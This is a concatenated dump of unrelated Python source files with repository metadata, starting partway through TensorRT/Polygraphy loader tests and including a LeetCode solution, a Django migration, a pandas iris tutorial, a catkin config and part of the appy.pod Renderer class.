builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity_identity"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def reshape_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["reshape"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def modifiable_network():
# Must return a loader since the network will be modified each time it's loaded.
return NetworkFromOnnxBytes(ONNX_MODELS["identity_identity"].loader)
@pytest.fixture(scope="session")
def modifiable_reshape_network():
# Must return a loader since the network will be modified each time it's loaded.
return NetworkFromOnnxBytes(ONNX_MODELS["reshape"].loader)
##
## Tests
##
class TestLoadPlugins(object):
def test_can_load_libnvinfer_plugins(self):
def get_plugin_names():
return [pc.name for pc in trt.get_plugin_registry().plugin_creator_list]
loader = LoadPlugins(
plugins=["nvinfer_plugin.dll" if sys.platform.startswith("win") else "libnvinfer_plugin.so"]
)
loader()
assert get_plugin_names()
class TestSerializedEngineLoader(object):
def test_serialized_engine_loader_from_lambda(self, identity_engine):
with util.NamedTemporaryFile() as outpath:
with open(outpath.name, "wb") as f, identity_engine.serialize() as buffer:
f.write(buffer)
loader = EngineFromBytes(lambda: open(outpath.name, "rb").read())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
def test_serialized_engine_loader_from_buffer(self, identity_engine):
with identity_engine.serialize() as buffer:
loader = EngineFromBytes(buffer)
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
class TestOnnxNetworkLoader(object):
def test_loader(self):
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader, explicit_precision=True)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
if mod.version(trt.__version__) < mod.version("8.0"):
assert network.has_explicit_precision
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.1.0.0"), reason="API was added in TRT 7.1")
class TestNetworkFromOnnxPath(object):
def test_loader(self):
builder, network, parser = network_from_onnx_path(ONNX_MODELS["identity"].path)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = network_from_onnx_path(ONNX_MODELS["identity"].path, explicit_precision=True)
with builder, network, parser:
assert not network.has_implicit_batch_dimension
if mod.version(trt.__version__) < mod.version("8.0"):
assert network.has_explicit_precision
class TestModifyNetwork(object):
def test_mark_layerwise(self, modifiable_network):
load_network = ModifyNetworkOutputs(modifiable_network, outputs=constants.MARK_ALL)
builder, network, parser = load_network()
with builder, network, parser:
for layer in network:
for index in range(layer.num_outputs):
assert layer.get_output(index).is_network_output
def test_mark_custom_outputs(self, modifiable_network):
builder, network, parser = modify_network_outputs(modifiable_network, outputs=["identity_out_0"])
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
def test_exclude_outputs_with_mark_layerwise(self, modifiable_network):
builder, network, parser = modify_network_outputs(
modifiable_network, outputs=constants.MARK_ALL, exclude_outputs=["identity_out_2"]
)
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.0"), reason="Unsupported for TRT 6")
def test_mark_shape_outputs(self, modifiable_reshape_network):
builder, network, parser = modify_network_outputs(
modifiable_reshape_network, outputs=["output", "reduce_prod_out_gs_2"]
)
with builder, network, parser:
assert network.num_outputs == 2
assert network.get_output(0).name == "reduce_prod_out_gs_2"
assert network.get_output(0).is_shape_tensor
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.0"), reason="Unsupported for TRT 6")
def test_unmark_shape_outputs(self, modifiable_reshape_network):
builder, network, parser = modify_network_outputs(
modifiable_reshape_network, outputs=constants.MARK_ALL, exclude_outputs=["reduce_prod_out_gs_2"]
)
with builder, network, parser:
assert network.num_outputs == 1
class TestConfigLoader(object):
def test_defaults(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
assert loader.timing_cache_path is None
with loader(builder, network) as config:
assert config.max_workspace_size == 1 << 24
with contextlib.suppress(AttributeError):
assert not config.get_flag(trt.BuilderFlag.TF32)
with contextlib.suppress(AttributeError):
assert not config.get_flag(trt.BuilderFlag.SPARSE_WEIGHTS)
assert not config.get_flag(trt.BuilderFlag.FP16)
assert not config.get_flag(trt.BuilderFlag.INT8)
assert config.num_optimization_profiles == 1
assert config.int8_calibrator is None
with contextlib.suppress(AttributeError):
if mod.version(trt.__version__) < mod.version("8.0"):
assert config.get_tactic_sources() == 3
else:
assert config.get_tactic_sources() == 7
def test_workspace_size(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(max_workspace_size=0)
with loader(builder, network) as config:
assert config.max_workspace_size == 0
@pytest.mark.parametrize("flag", [True, False])
def test_strict_types(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(strict_types=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.STRICT_TYPES) == flag
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0.0.0"), reason="API was added in TRT 8.0")
@pytest.mark.parametrize("flag", [True, False])
def test_restricted(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(restricted=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.SAFETY_SCOPE) == flag
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.1.0.0"), reason="API was added in TRT 7.1")
@pytest.mark.parametrize("flag", [True, False])
def test_tf32(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(tf32=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.TF32) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_fp16(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(fp16=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.FP16) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_int8(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(int8=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.INT8) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_allow_gpu_fallback(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(allow_gpu_fallback=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.GPU_FALLBACK) == flag
@pytest.mark.skipif(
mod.version(trt.__version__) < mod.version("8.0"), reason="API was not available in 7.2 and older"
)
@pytest.mark.parametrize("flag", [True, False])
def test_sparse_weights(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(sparse_weights=flag)
with loader(builder, network) as config:
assert config.get_flag(trt.BuilderFlag.SPARSE_WEIGHTS) == flag
def test_use_dla(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(use_dla=True)
with loader(builder, network) as config:
assert config.default_device_type == trt.DeviceType.DLA
assert config.DLA_core == 0
with contextlib.suppress(AttributeError):
if mod.version(trt.__version__) < mod.version("8.0"):
TACTIC_SOURCES_CASES = [
(None, 3), # By default, all sources are enabled.
([], 0),
([trt.TacticSource.CUBLAS], 1),
([trt.TacticSource.CUBLAS_LT], 2),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 3),
]
else:
TACTIC_SOURCES_CASES = [
(None, 7), # By default, all sources are enabled.
([], 0),
([trt.TacticSource.CUBLAS], 1),
([trt.TacticSource.CUBLAS_LT], 2),
([trt.TacticSource.CUDNN], 4),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 3),
([trt.TacticSource.CUBLAS, trt.TacticSource.CUDNN], 5),
([trt.TacticSource.CUBLAS_LT, trt.TacticSource.CUDNN], 6),
([trt.TacticSource.CUDNN, trt.TacticSource.CUBLAS, trt.TacticSource.CUBLAS_LT], 7),
]
@pytest.mark.parametrize("sources, expected", TACTIC_SOURCES_CASES)
def test_tactic_sources(self, identity_builder_network, sources, expected):
builder, network = identity_builder_network
loader = CreateConfig(tactic_sources=sources)
with loader(builder, network) as config:
assert config.get_tactic_sources() == expected
def test_calibrator_metadata_set(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
loader = CreateConfig(int8=True, calibrator=calibrator)
with loader(builder, network) as config:
assert config.int8_calibrator
assert "x" in calibrator.data_loader.input_metadata
def test_multiple_profiles(self, identity_builder_network):
builder, network = identity_builder_network
profiles = [
Profile().add("x", (1, 2, 1, 1), (1, 2, 2, 2), (1, 2, 4, 4)),
Profile().add("x", (1, 2, 4, 4), (1, 2, 8, 8), (1, 2, 16, 16)),
]
loader = CreateConfig(profiles=profiles)
with loader(builder, network) as config:
assert config.num_optimization_profiles == 2
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
@pytest.mark.parametrize("path_mode", [True, False], ids=["path", "file-like"])
def test_timing_cache(self, identity_builder_network, path_mode):
builder, network = identity_builder_network
with util.NamedTemporaryFile() as cache:
loader = CreateConfig(load_timing_cache=cache.name if path_mode else cache)
with loader(builder, network) as config:
assert config.get_timing_cache()
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
def test_empty_timing_cache_when_default(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
with loader(builder, network) as config:
cache = config.get_timing_cache()
with cache.serialize() as buffer:
cache_size = len(bytes(buffer))
cache.reset()
with cache.serialize() as buffer:
new_cache_size = len(bytes(buffer))
assert cache_size == new_cache_size
class TestEngineBytesFromNetwork(object):
def test_can_build(self, identity_network):
loader = EngineBytesFromNetwork(identity_network)
with loader() as serialized_engine:
assert isinstance(serialized_engine, trt.IHostMemory)
class TestEngineFromNetwork(object):
def test_defaults(self, identity_network):
loader = EngineFromNetwork(identity_network)
assert loader.timing_cache_path is None
def test_can_build_with_parser_owning(self, identity_network):
loader = EngineFromNetwork(identity_network)
with loader():
pass
def test_can_build_without_parser_non_owning(self, identity_builder_network):
builder, network = identity_builder_network
loader = EngineFromNetwork((builder, network))
with loader():
pass
def test_can_build_with_calibrator(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
create_config = CreateConfig(int8=True, calibrator=calibrator)
loader = EngineFromNetwork((builder, network), create_config)
with loader():
pass
# Calibrator buffers should be freed after the build
assert all([buf.allocated_nbytes == 0 for buf in calibrator.device_buffers.values()])
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
@pytest.mark.parametrize("path_mode", [True, False], ids=["path", "file-like"])
def test_timing_cache_generate_and_append(self, path_mode):
with util.NamedTemporaryFile() as total_cache, util.NamedTemporaryFile() as identity_cache:
def build_engine(model, cache):
if not path_mode:
cache.seek(0)
network_loader = NetworkFromOnnxBytes(ONNX_MODELS[model].loader)
# In non-path_mode, use the file-like object directly.
# Must load the cache with CreateConfig so that new data is appended
# instead of overwriting the previous cache.
loader = EngineFromNetwork(
network_loader,
CreateConfig(load_timing_cache=cache.name),
save_timing_cache=cache.name if path_mode else cache,
)
with loader():
pass
if not path_mode:
cache.seek(0)
assert not total_cache.read()
build_engine("const_foldable", total_cache)
const_foldable_cache_size = get_file_size(total_cache.name)
# Build this network twice. Once with a fresh cache so we can determine its size.
assert get_file_size(identity_cache.name) == 0
build_engine("identity", identity_cache)
identity_cache_size = get_file_size(identity_cache.name)
build_engine("identity", total_cache)
total_cache_size = get_file_size(total_cache.name)
# The total cache should be larger than either of the individual caches.
assert total_cache_size > const_foldable_cache_size and total_cache_size > identity_cache_size
# The total cache should also be smaller than or equal to the sum of the individual caches since
# header information should not be duplicated.
assert total_cache_size <= (const_foldable_cache_size + identity_cache_size)
class TestBytesFromEngine(object):
def test_serialize_engine(self, identity_network):
with engine_from_network(identity_network) as engine:
serialized_engine = bytes_from_engine(engine)
assert isinstance(serialized_engine, bytes)
class TestSaveEngine(object):
def test_save_engine(self, identity_network):
with util.NamedTemporaryFile() as outpath:
engine_loader = SaveEngine(EngineFromNetwork(identity_network), path=outpath.name)
with engine_loader():
assert is_file_non_empty(outpath.name)
class TestOnnxLikeFromNetwork(object):
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.2"), reason="Unsupported for TRT 7.1 and older")
@pytest.mark.parametrize(
"model_name", ["identity", "empty_tensor_expand", "const_foldable", "and", "scan", "dim_param", "tensor_attr"]
)
def test_onnx_like_from_network(self, model_name):
assert onnx_like_from_network(NetworkFromOnnxBytes(ONNX_MODELS[model_name].loader))
| [
"[email protected]"
]
| |
352fc2592e428da6a89e6a9b67cbe4e96f892a87 | 3ca6b34676a0adeaba85a2953a8c9abf5d6ef3e4 | /cap 2/ex2.3 mensagem_pessoal.py | d266787bc99096ebbba2c49184dbe991fa9c8afc | []
| no_license | giusepper11/Curso-intensivo-Python | 34fb8e94c7c9afb09f54d8fc67136b337d0ef106 | 613cd502af3ff877dac0d62d9eb09b290d227838 | refs/heads/master | 2021-08-30T11:41:42.824065 | 2017-12-17T19:47:15 | 2017-12-17T19:47:15 | 114,535,941 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | name = "Giuseppe"
print('Alo ' + name + ', voce gostaria de aprender mais sobre python? ')
| [
"[email protected]"
]
| |
804b7d2aeaf690de61b0b87bbb40796c12287a2a | dfaf5cd5607c2c4e55ec9173d2d7ca12842db129 | /104_findDiagonalOrder.py | add0e471b6091ea711a6ab960ca377f92f09bd77 | []
| no_license | khinthandarkyaw98/Leetcode | 2b0be053931b3ddec6309d136228dae1f4c61b2b | 578f2a38d8a41864ebfd6c4e941f6915c7c0a508 | refs/heads/master | 2023-06-24T02:34:59.399319 | 2021-07-14T19:37:14 | 2021-07-14T19:37:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | import collections
class Solution:
def findDiagonalOrder(self, nums: List[List[int]]) -> List[int]:
res = []
q = collections.deque()
q.append((0,0))
while q:
row, col = q.popleft()
if col == 0 and row < len(nums)-1:
q.append((row + 1, col))
if col< len(nums[row])-1:
q.append((row, col+1))
res.append(nums[row][col])
return res
| [
"[email protected]"
]
| |
be4a4e2c0ee32b41a05520c16e30dac4c1106efe | 922e923bdab099efa7161f5806ed262ba5cc84c4 | /apps/documents/migrations/0006_boardmeetingaudio_boardmeetingvideo.py | 22c1e2091ad36ddb3047bb2b82dd82b211ce2165 | [
"MIT"
]
| permissive | iamjdcollins/districtwebsite | eadd45a7bf49a43e6497f68a361329f93c41f117 | 89e2aea47ca3d221665bc23586a4374421be5800 | refs/heads/master | 2021-07-05T19:06:12.458608 | 2019-02-20T17:10:10 | 2019-02-20T17:10:10 | 109,855,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,722 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 17:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('objects', '0005_auto_20171210_1447'),
('documents', '0005_boardmeetingagenda_boardmeetingminutes'),
]
operations = [
migrations.CreateModel(
name='BoardMeetingAudio',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingaudio_document_node', models.OneToOneField(db_column='boardmeetingaudio_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingaudio_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingaudio', 'Can soft delete board meeting audio'), ('restore_boardmeetingaudio', 'Can restore board meeting audio')),
'verbose_name_plural': 'Board Meeting Audio',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingaudio',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Audio',
},
bases=('objects.document',),
),
migrations.CreateModel(
name='BoardMeetingVideo',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingvideo_document_node', models.OneToOneField(db_column='boardmeetingvideo_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingvideo_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingvideo', 'Can soft delete board meeting video'), ('restore_boardmeetingvideo', 'Can restore board meeting video')),
'verbose_name_plural': 'Board Meeting Videos',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingvideo',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Video',
},
bases=('objects.document',),
),
]
| [
"[email protected]"
]
| |
71420c46e794fbf9129e80cd832982ba3453f560 | c0836fbc0d26ec5b4fbef8b116536ee1573a63e3 | /1_basic/2_pandas/pandas_15.py | c103bccdeca3d2290f5bb6aabbc243f1cc9500b8 | []
| no_license | SungmanHan/machineLearningStudy | 5e4c2869351cceddb6cd212323c4a710a97984cc | 36854f946252158b2cdb18b6842f0c905d0811b1 | refs/heads/master | 2020-07-12T21:21:18.126845 | 2019-09-25T13:23:50 | 2019-09-25T13:23:50 | 204,908,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py | # -*- coding: utf-8 -*-
import pandas as pd
# 사이킷 런의 sklearn.datasets 패키지 내부의
# 학습 데이터를 로딩하는 코드
# (load_... 이름으로 함수가 정의되어 있음)
from sklearn.datasets import load_iris
# iris 데이터를 로딩하는 코드
iris_data = load_iris()
# Bunch 클래스 타입의 값이 반환
# 파이썬의 딕셔너리와 유사한 타입으로
# 키값을 사용하여 데이터를 추출할 수 있음
print(type(iris_data))
# Bunch 클래스 keys 메소드
# 사용할 수 있는 키의 목록을 반환하는 메소드
print(iris_data.keys())
# 키 값 'data' 는 특성 데이터를 반환
# (numpy 2차원 배열의 형태)
print(iris_data['data'])
print(iris_data.data)
print(type(iris_data.data))
# pandas 데이터 프레임으로
# 특성 데이터를 저장
X_df = pd.DataFrame(iris_data.data)
# Bunch 클래스의 타입의 feature_names 키 값을
# 사용하여 데이터프레임의 헤더를 설정
X_df.columns = iris_data.feature_names
# iris 데이터의 샘플 개수 및 결측데이터 확인
print(X_df.info())
# iris 데이터의 수치 데이터 통계 확인
print(X_df.describe())
# 라벨 데이터의 데이터프레임 생성
# 키 값 'target' 은 라벨 데이터를 반환
# (numpy 1차원 배열의 형태)
y_df = pd.Series(iris_data.target)
# 데이터의 확인
# 사이킷 런에서 제공되는 데이터들은
# 전처리가 완료된 상태의 데이터이므로
# 문자열이 아닌 수치 데이터가 제공됨
print(y_df)
# 라벨 데이터의 분포 확인
print(y_df.value_counts())
print(y_df.value_counts() / len(y_df))
# 특성 데이터와 라벨 데이터의 결합
all_df = pd.concat([X_df, y_df], axis=1)
# pandas 옵션을 사용하여 화면에 출력할
# 최대 컬럼 개수를 조정
pd.options.display.max_columns = 10
print(all_df)
# 데이터 프레임 내부의 특성 간 상관관계를
# 분석하여 반환하는 메소드 - corr()
corr_df = all_df.corr()
# 결과(라벨) 데이터와 특성 데이터들간의
# 상관관계를 출력
# 1에 가까울수록 강한 양의 상관관계를 보여줌
# (라벨 데이터의 수치가 커질수록 특성 데이터의
# 값이 증가)
# 0에 가까울수록 약한 상관관계를 보여줌
# (특성 데이터의 수치 변화가 특성 데이터와 관계없음)
# -1에 가까울수록 강한 음의 상관관계를 보여줌
# (특성 데이터의 수치가 커질수록 특성 데이터의
# 값이 감소)
print(corr_df)
print(iris_data.target_names)
| [
"[email protected]"
]
| |
8edae035598a6bff9f6a7325d526abfd07cb3fab | e5ba55ac56d2d07aeebd7253fbe5d186196c9a52 | /catkin_ws/catkin_ws/build/iai_kinect2/kinect2_registration/catkin_generated/pkg.installspace.context.pc.py | 85e878c71d08a7cf827ee4e610db3258f4e5642e | []
| no_license | masiro97/darrsm | 5305a3e7c1fba2635a4925b9e079f45b40162862 | b881d00427d2af5d75ca509a191e57f2890e1ece | refs/heads/master | 2021-05-10T21:57:17.760536 | 2018-01-20T15:13:56 | 2018-01-20T15:13:56 | 111,084,804 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include;/usr/include".split(';') if "/home/cun/catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so".split(';') if "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so" != "" else []
PROJECT_NAME = "kinect2_registration"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.0.1"
| [
"[email protected]"
]
| |
989cebdde1f1edb13d8b2c625c233a9d8db44468 | cd04112e1b8995cabb3464fe408c308aa3005bdd | /pylib/appy/pod/renderer.py | cd28abab24a9009d15aec2f623c459106b8ec56f | []
| no_license | vampolo/cacerp | 6fc132bf827fb9ec245f32d6caf6d4c5ab827e2d | 57aef2008ae4cb6e783d46b0cfc7cfc32b16a54c | refs/heads/master | 2021-01-19T05:28:57.675300 | 2011-03-28T17:17:24 | 2011-03-28T17:17:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,528 | py | # ------------------------------------------------------------------------------
# Appy is a framework for building applications in the Python language.
# Copyright (C) 2007 Gaetan Delannay
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA.
# ------------------------------------------------------------------------------
import zipfile, shutil, xml.sax, os, os.path, re, mimetypes, time
from UserDict import UserDict
import appy.pod
from appy.pod import PodError
from appy.shared import mimeTypesExts
from appy.shared.xml_parser import XmlElement
from appy.shared.utils import FolderDeleter, executeCommand
from appy.pod.pod_parser import PodParser, PodEnvironment, OdInsert
from appy.pod.converter import FILE_TYPES
from appy.pod.buffers import FileBuffer
from appy.pod.xhtml2odt import Xhtml2OdtConverter
from appy.pod.doc_importers import OdtImporter, ImageImporter, PdfImporter
from appy.pod.styles_manager import StylesManager
# ------------------------------------------------------------------------------
BAD_CONTEXT = 'Context must be either a dict, a UserDict or an instance.'
RESULT_FILE_EXISTS = 'Result file "%s" exists.'
CANT_WRITE_RESULT = 'I cannot write result file "%s". %s'
TEMP_FOLDER_EXISTS = 'I need to use a temp folder "%s" but this folder ' \
'already exists.'
CANT_WRITE_TEMP_FOLDER = 'I cannot create temp folder "%s". %s'
NO_PY_PATH = 'Extension of result file is "%s". In order to perform ' \
'conversion from ODT to this format we need to call OpenOffice. ' \
'But the Python interpreter which runs the current script does ' \
'not know UNO, the library that allows to connect to ' \
'OpenOffice in server mode. If you can\'t install UNO in this ' \
'Python interpreter, you can specify, in parameter ' \
'"pythonWithUnoPath", the path to a UNO-enabled Python ' \
'interpreter. One such interpreter may be found in ' \
'<open_office_path>/program.'
PY_PATH_NOT_FILE = '"%s" is not a file. You must here specify the absolute ' \
'path of a Python interpreter (.../python, .../python.sh, ' \
'.../python.exe, .../python.bat...).'
BLANKS_IN_PATH = 'Blanks were found in path "%s". Please use the DOS-names ' \
'(ie, "progra~1" instead of "Program files" or "docume~1" ' \
'instead of "Documents and settings".'
BAD_RESULT_TYPE = 'Result "%s" has a wrong extension. Allowed extensions ' \
'are: "%s".'
CONVERT_ERROR = 'An error occurred during the conversion. %s'
BAD_OO_PORT = 'Bad OpenOffice port "%s". Make sure it is an integer.'
XHTML_ERROR = 'An error occurred while rendering XHTML content.'
WARNING_INCOMPLETE_ODT = 'Warning: your ODT file may not be complete (ie ' \
'imported documents may not be present). This is ' \
'because we could not connect to OpenOffice in ' \
'server mode: %s'
DOC_NOT_SPECIFIED = 'Please specify a document to import, either with a ' \
'stream (parameter "content") or with a path (parameter ' \
'"at")'
DOC_FORMAT_ERROR = 'POD was unable to deduce the document format. Please ' \
'specify it through parameter named "format" (=odt, gif, ' \
'png, ...).'
DOC_WRONG_FORMAT = 'Format "%s" is not supported.'
WARNING_FINALIZE_ERROR = 'Warning: error while calling finalize function. %s'
# Default automatic text styles added by pod in content.xml
f = open('%s/styles.in.content.xml' % os.path.dirname(appy.pod.__file__))
CONTENT_POD_STYLES = f.read()
f.close()
# Default font added by pod in content.xml
CONTENT_POD_FONTS = '<@style@:font-face style:name="PodStarSymbol" ' \
'@svg@:font-family="StarSymbol"/>'
# Default text styles added by pod in styles.xml
f = file('%s/styles.in.styles.xml' % os.path.dirname(appy.pod.__file__))
STYLES_POD_STYLES = f.read()
f.close()
# Default font added by pod
STYLES_POD_FONTS = '<@style@:font-face @style@:name="PodStarSymbol" ' \
'@svg@:font-family="StarSymbol"/>'
# ------------------------------------------------------------------------------
class Renderer:
def __init__(self, template, context, result, pythonWithUnoPath=None,
ooPort=2002, stylesMapping={}, forceOoCall=False,
finalizeFunction=None):
'''This Python Open Document Renderer (PodRenderer) loads a document
template (p_template) which is an ODT file with some elements
written in Python. Based on this template and some Python objects
defined in p_context, the renderer generates an ODT file
(p_result) that instantiates the p_template and fills it with objects
from the p_context.
- If p_result does not end with .odt, the Renderer
will call OpenOffice to perform a conversion. If p_forceOoCall is
True, even if p_result ends with .odt, OpenOffice will be called, not
for performing a conversion, but for updating some elements like
indexes (table of contents, etc) and sections containing links to
external files (which is the case, for example, if you use the
default function "document").
- If the Python interpreter which runs the current script is not
UNO-enabled, this script will run, in another process, a UNO-enabled
Python interpreter (whose path is p_pythonWithUnoPath) which will
call OpenOffice. In both cases, we will try to connect to OpenOffice
in server mode on port p_ooPort.
- If you plan to make "XHTML to OpenDocument" conversions, you may
specify a styles mapping in p_stylesMapping.
- If you specify a function in p_finalizeFunction, this function will
be called by the renderer before re-zipping the ODT result. This way,
you can still perform some actions on the content of the ODT file
before it is zipped and potentially converted. This function must
accept one arg: the absolute path to the temporary folder containing
the un-zipped content of the ODT result.'''
self.template = template
self.templateZip = zipfile.ZipFile(template)
self.result = result
self.contentXml = None # Content (string) of content.xml
self.stylesXml = None # Content (string) of styles.xml
self.stylesManager = None # Manages the styles defined into the ODT
# template
self.tempFolder = None
self.env = None
self.pyPath = pythonWithUnoPath
self.ooPort = ooPort
self.forceOoCall = forceOoCall
self.finalizeFunction = finalizeFunction
# Retain potential files or images that will be included through
# "do ... from document" statements: we will need to declare them in
# META-INF/manifest.xml.
self.fileNames = []
self.prepareFolders()
# Unzip template
self.unzipFolder = os.path.join(self.tempFolder, 'unzip')
os.mkdir(self.unzipFolder)
for zippedFile in self.templateZip.namelist():
# Before writing the zippedFile into self.unzipFolder, create the
# intermediary subfolder(s) if needed.
fileName = None
if zippedFile.endswith('/') or zippedFile.endswith(os.sep):
# This is an empty folder. Create it nevertheless.
os.makedirs(os.path.join(self.unzipFolder, zippedFile))
else:
fileName = os.path.basename(zippedFile)
folderName = os.path.dirname(zippedFile)
fullFolderName = self.unzipFolder
if folderName:
fullFolderName = os.path.join(fullFolderName, folderName)
if not os.path.exists(fullFolderName):
os.makedirs(fullFolderName)
# Unzip the file in self.unzipFolder
if fileName:
fullFileName = os.path.join(fullFolderName, fileName)
f = open(fullFileName, 'wb')
fileContent = self.templateZip.read(zippedFile)
if (fileName == 'content.xml') and not folderName:
# content.xml files may reside in subfolders.
# We modify only the one in the root folder.
self.contentXml = fileContent
elif (fileName == 'styles.xml') and not folderName:
# Same remark as above.
self.stylesManager = StylesManager(fileContent)
self.stylesXml = fileContent
f.write(fileContent)
f.close()
self.templateZip.close()
# Create the content.xml parser
pe = PodEnvironment
contentInserts = (
OdInsert(CONTENT_POD_FONTS,
XmlElement('font-face-decls', nsUri=pe.NS_OFFICE),
nsUris={'style': pe.NS_STYLE, 'svg': pe.NS_SVG}),
OdInsert(CONTENT_POD_STYLES,
XmlElement('automatic-styles', nsUri=pe.NS_OFFICE),
nsUris={'style': pe.NS_STYLE, 'fo': pe.NS_FO,
'text': pe.NS_TEXT, 'table': pe.NS_TABLE}))
self.contentParser = self.createPodParser('content.xml', context,
contentInserts)
# Create the styles.xml parser
stylesInserts = (
OdInsert(STYLES_POD_FONTS,
XmlElement('font-face-decls', nsUri=pe.NS_OFFICE),
nsUris={'style': pe.NS_STYLE, 'svg': pe.NS_SVG}),
OdInsert(STYLES_POD_STYLES,
XmlElement('styles', nsUri=pe.NS_OFFICE),
nsUris={'style': pe.NS_STYLE, 'fo': pe.NS_FO}))
self.stylesParser = self.createPodParser('styles.xml', context,
stylesInserts)
# Stores the styles mapping
self.setStylesMapping(stylesMapping)
def createPodParser(self, odtFile, context, inserts):
'''Creates the parser with its environment for parsing the given
p_odtFile (content.xml or styles.xml). p_context is given by the pod
user, while p_inserts depends on the ODT file we must parse.'''
evalContext = {'xhtml': self.renderXhtml,
'test': self.evalIfExpression,
'document': self.importDocument} # Default context
if hasattr(context, '__dict__'):
evalContext.update(context.__dict__)
elif isinstance(context, dict) or isinstance(context, UserDict):
evalContext.update(context)
else:
raise PodError(BAD_CONTEXT)
env = PodEnvironment(evalContext, inserts)
